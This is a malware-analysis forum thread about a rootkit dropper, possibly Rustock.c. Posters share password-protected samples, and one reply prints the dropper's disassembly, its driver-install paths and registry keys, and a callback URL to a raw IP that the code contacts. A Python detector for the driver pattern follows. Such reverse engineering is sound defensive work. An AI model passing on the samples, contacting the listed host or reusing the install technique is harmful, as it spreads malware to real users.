Tuts 4 You


Posted (edited)

I've already taken apart the dropper, but I just want to see if anyone here can unpack what it drops. I won't say anything else; interested in feedback.

zip pass = infected

GodLike.zip

Edited by hiya
Posted (edited)

The malware installs and loads a rootkit from the following paths:

[Paths]

\\127.0.0.1\admin$\system32\drivers\Random_Name.sys
X:\WINDOWS\system32\drivers\Random_Name.sys

[Rootkit registry key]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Random_Name.sys]
"Type"=dword:00000001
"Start"=dword:00000001
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):5c,00,3f,00,3f,00,5c,00,43,00,3a,00,5c,00,57,00,49,00,4e,00,\
44,00,4f,00,57,00,53,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,\
00,5c,00,64,00,72,00,69,00,76,00,65,00,72,00,73,00,5c,00,63,00,32,00,66,00,\
35,00,65,00,64,00,32,00,65,00,2e,00,73,00,79,00,73,00,00,00
"DisplayName"="Random_Name.sys"

ImagePath : \??\C:\WINDOWS\system32\drivers\c2f5ed2e.sys
ImagePath : 5c3f3f5c433a5c57494e444f57535c73797374656d33325c647269766572735c63326635656432652e737973

Kernel mode Thread Created : Random_Name.sys[.text]

[Rootkit Imports]

DbgPrint
IoAttachDevice
ExRaiseAccessViolation
IofCallDriver
KePulseEvent
NtQueryInformationFile
NtCreateFile
ExAllocatePoolWithQuota
ZwClose
IoDeleteDevice
ExRaiseException
IoFreeIrp
NtOpenProcess
KeNumberProcessors

h t t p://81.29.242.20/test/err.php?err=%srsc33CDF2DA

[c2f5ed2e.sys] Rootkit attached with password : infected

------------
004010A6 BE 59154000 MOV ESI,xyyy.00401559
004010AB BF CC7B4000 MOV EDI,xyyy.00407BCC
004010B0 AD LODS DWORD PTR DS:[ESI]
004010B1 85C0 TEST EAX,EAX
004010B3 74 17 JE SHORT xyyy.004010CC
004010B5 50 PUSH EAX
004010B6 FF15 46104000 CALL DWORD PTR DS:[<&kernel32.LoadLibraryA>] ; kernel32.LoadLibraryA
004010BC 56 PUSH ESI
004010BD 50 PUSH EAX
004010BE FF15 42104000 CALL DWORD PTR DS:[<&kernel32.GetProcAddress>] ; kernel32.GetProcAddress
004010C4 AB STOS DWORD PTR ES:[EDI]
004010C5 AC LODS BYTE PTR DS:[ESI]
004010C6 84C0 TEST AL,AL
004010C8 ^ 75 FB JNZ SHORT xyyy.004010C5
004010CA ^ EB E4 JMP SHORT xyyy.004010B0
004010CC BE 09154000 MOV ESI,xyyy.00401509 ; ASCII "rsc33CDF2DA"
004010D1 56 PUSH ESI
004010D2 FF15 0C7C4000 CALL DWORD PTR DS:[407C0C] ; kernel32.GlobalFindAtomA
004010D8 66:85C0 TEST AX,AX
004010DB 0F85 62010000 JNZ xyyy.00401243
004010E1 56 PUSH ESI
004010E2 FF15 107C4000 CALL DWORD PTR DS:[407C10] ; kernel32.GlobalAddAtomA
004010E8 FF15 CC7B4000 CALL DWORD PTR DS:[407BCC] ; kernel32.GetVersion
004010EE 3C 05 CMP AL,5
004010F0 0F82 0C010000 JB xyyy.00401202
004010F6 50 PUSH EAX
004010F7 E8 EF010000 CALL xyyy.004012EB
004010FC 85C0 TEST EAX,EAX
004010FE 75 60 JNZ SHORT xyyy.00401160
00401100 58 POP EAX
00401101 3C 06 CMP AL,6
00401103 0F82 00010000 JB xyyy.00401209
00401109 6A 00 PUSH 0
0040110B 6A 00 PUSH 0
0040110D 6A 00 PUSH 0
0040110F 68 C5124000 PUSH xyyy.004012C5
00401114 6A 00 PUSH 0
00401116 6A 00 PUSH 0
00401118 FF15 E07B4000 CALL DWORD PTR DS:[407BE0] ; kernel32.CreateThread
0040111E BE F87A4000 MOV ESI,xyyy.00407AF8
00401123 68 00010000 PUSH 100
00401128 56 PUSH ESI
00401129 6A 00 PUSH 0
0040112B FF15 D87B4000 CALL DWORD PTR DS:[407BD8] ; kernel32.GetModuleFileNameA
00401131 C70406 22000000 MOV DWORD PTR DS:[ESI+EAX],22
00401138 6A 00 PUSH 0
0040113A 6A 00 PUSH 0
0040113C 68 F47A4000 PUSH xyyy.00407AF4 ; ASCII "/c """
00401141 68 DA144000 PUSH xyyy.004014DA ; ASCII "cmd.exe"
00401146 68 D4144000 PUSH xyyy.004014D4 ; ASCII "runas"
0040114B 6A 00 PUSH 0
0040114D FF15 D47B4000 CALL DWORD PTR DS:[407BD4] ; shell32.ShellExecuteA
00401153 83F8 20 CMP EAX,20
00401156 ^ 72 E0 JB SHORT xyyy.00401138
00401158 6A 00 PUSH 0
0040115A FF15 D07B4000 CALL DWORD PTR DS:[407BD0] ; kernel32.ExitProcess
00401160 0F31 RDTSC
00401162 89C5 MOV EBP,EAX
00401164 C1C5 10 ROL EBP,10
00401167 31D5 XOR EBP,EDX
00401169 6A 50 PUSH 50
0040116B 68 F87A4000 PUSH xyyy.00407AF8
00401170 FF15 F87B4000 CALL DWORD PTR DS:[407BF8] ; kernel32.GetSystemDirectoryA
00401176 55 PUSH EBP
00401177 68 F87A4000 PUSH xyyy.00407AF8
0040117C 68 BF144000 PUSH xyyy.004014BF ; ASCII "%s\drivers\%0.8x.sys"
00401181 68 487B4000 PUSH xyyy.00407B48
00401186 FF15 E87B4000 CALL DWORD PTR DS:[407BE8] ; USER32.wsprintfA
0040118C BE F87A4000 MOV ESI,xyyy.00407AF8
00401191 55 PUSH EBP
00401192 68 91144000 PUSH xyyy.00401491 ; ASCII "\\127.0.0.1\admin$\system32\drivers\%0.8x.sys"
00401197 56 PUSH ESI
00401198 FF15 E87B4000 CALL DWORD PTR DS:[407BE8] ; USER32.wsprintfA
0040119E 83C4 0C ADD ESP,0C
004011A1 6A 00 PUSH 0
004011A3 6A 00 PUSH 0
004011A5 6A 02 PUSH 2
004011A7 6A 00 PUSH 0
004011A9 6A 00 PUSH 0
004011AB 68 00000040 PUSH 40000000
004011B0 56 PUSH ESI
004011B1 FF15 EC7B4000 CALL DWORD PTR DS:[407BEC] ; kernel32.CreateFileA
004011B7 83F8 FF CMP EAX,-1
004011BA 75 1F JNZ SHORT xyyy.004011DB
004011BC 6A 00 PUSH 0
004011BE 6A 00 PUSH 0
004011C0 6A 02 PUSH 2
004011C2 6A 00 PUSH 0
004011C4 6A 00 PUSH 0
004011C6 68 00000040 PUSH 40000000
004011CB 68 487B4000 PUSH xyyy.00407B48
004011D0 FF15 EC7B4000 CALL DWORD PTR DS:[407BEC] ; kernel32.CreateFileA
004011D6 83F8 FF CMP EAX,-1
004011D9 74 35 JE SHORT xyyy.00401210
004011DB 89C6 MOV ESI,EAX
004011DD 68 00640000 PUSH 6400
004011E2 68 F4164000 PUSH xyyy.004016F4
004011E7 56 PUSH ESI
004011E8 FF15 F07B4000 CALL DWORD PTR DS:[407BF0] ; kernel32._lwrite
004011EE 56 PUSH ESI
004011EF FF15 F47B4000 CALL DWORD PTR DS:[407BF4] ; kernel32._lclose
004011F5 E8 3E010000 CALL xyyy.00401338
004011FA 85C0 TEST EAX,EAX
004011FC 74 19 JE SHORT xyyy.00401217
004011FE 31F6 XOR ESI,ESI
00401200 EB 1A JMP SHORT xyyy.0040121C
00401202 BE 3C144000 MOV ESI,xyyy.0040143C ; ASCII "invalid_os_version"
00401207 EB 13 JMP SHORT xyyy.0040121C
00401209 BE 4F144000 MOV ESI,xyyy.0040144F ; ASCII "not_enought_privilegies"
0040120E EB 0C JMP SHORT xyyy.0040121C
00401210 BE 67144000 MOV ESI,xyyy.00401467 ; ASCII "create_driver_file_fail"
00401215 EB 05 JMP SHORT xyyy.0040121C
00401217 BE 7F144000 MOV ESI,xyyy.0040147F ; ASCII "load_driver_error"
0040121C 85F6 TEST ESI,ESI
0040121E 74 23 JE SHORT xyyy.00401243
00401220 BF F87A4000 MOV EDI,xyyy.00407AF8
00401225 56 PUSH ESI
00401226 68 E2144000 PUSH xyyy.004014E2 ; ASCII "http://81.29.242.20/test/err.php?err=%srsc33CDF2DA"
0040122B 57 PUSH EDI
0040122C FF15 E87B4000 CALL DWORD PTR DS:[407BE8] ; USER32.wsprintfA
00401232 83C4 0C ADD ESP,0C
00401235 6A 00 PUSH 0
00401237 6A 00 PUSH 0
00401239 57 PUSH EDI
0040123A 57 PUSH EDI
0040123B 6A 00 PUSH 0
0040123D FF15 087C4000 CALL DWORD PTR DS:[407C08] ; urlmon.URLDownloadToFileA
00401243 6A 00 PUSH 0
00401245 FF15 D07B4000 CALL DWORD PTR DS:[407BD0] ; kernel32.ExitProcess
------------

Rootkit.rar

Edited by STRELiTZIA
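Added example, not from the post or its author: parse the .reg export above, decode the hex(2) ImagePath to the driver path, and flag service entries matching the naming pattern the disassembly shows (wsprintfA with "%0.8x.sys" on an RDTSC-derived value). REG_SAMPLE is constructed from the posted fragment; the function names are my own.

```python
import re

# Constructed sample modelled on the .reg export in the post above. hex(2) is
# REG_EXPAND_SZ stored as UTF-16LE bytes; a trailing backslash continues the line.
REG_SAMPLE = r"""
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Random_Name.sys]
"Type"=dword:00000001
"Start"=dword:00000001
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):5c,00,3f,00,3f,00,5c,00,43,00,3a,00,5c,00,57,00,49,00,4e,00,\
  44,00,4f,00,57,00,53,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,\
  00,5c,00,64,00,72,00,69,00,76,00,65,00,72,00,73,00,5c,00,63,00,32,00,66,00,\
  35,00,65,00,64,00,32,00,65,00,2e,00,73,00,79,00,73,00,00,00
"""

# The dropper builds the driver name with wsprintfA("%0.8x.sys", <RDTSC-derived value>).
RANDOM_SYS = re.compile(r"^[0-9a-f]{8}\.sys$", re.IGNORECASE)


def parse_reg(text):
    """Parse a .reg export into {key: {value_name: (kind, value)}} (dword and hex(2) only)."""
    text = re.sub(r",\\\s*\n\s*", ",", text)  # join hex continuation lines
    keys, current = {}, None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = re.match(r'"([^"]+)"=(.*)', line)
        if not m or current is None:
            continue
        name, raw = m.groups()
        if raw.startswith("dword:"):
            keys[current][name] = ("dword", int(raw[6:], 16))
        elif raw.startswith("hex(2):"):
            data = bytes(int(b, 16) for b in raw[7:].split(",") if b)
            keys[current][name] = ("expand_sz", data.decode("utf-16-le").rstrip("\x00"))
    return keys

def suspicious_driver_services(keys):
    """Flag service keys for kernel drivers (Type=1) set to SYSTEM_START (Start=1)
    whose image under drivers\\ is an 8-hex-digit .sys, this dropper's naming pattern."""
    hits = []
    for key, vals in keys.items():
        kernel_sys_start = vals.get("Type") == ("dword", 1) and vals.get("Start") == ("dword", 1)
        image = vals.get("ImagePath", ("", ""))[1]
        if kernel_sys_start and "\\drivers\\" in image.lower() \
                and RANDOM_SYS.match(image.rsplit("\\", 1)[-1]):
            hits.append((key.rsplit("\\", 1)[-1], image))
    return hits
```

Run against a full `reg export HKLM\SYSTEM\CurrentControlSet\Services` the same way; a legitimately named driver such as beep.sys is not flagged.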
Posted (edited)

Yeah, it was supposed to be the Rustock.c dropper. Someone said the driver has a really advanced mutation. Doesn't look like the right rootkit.

Edited by hiya
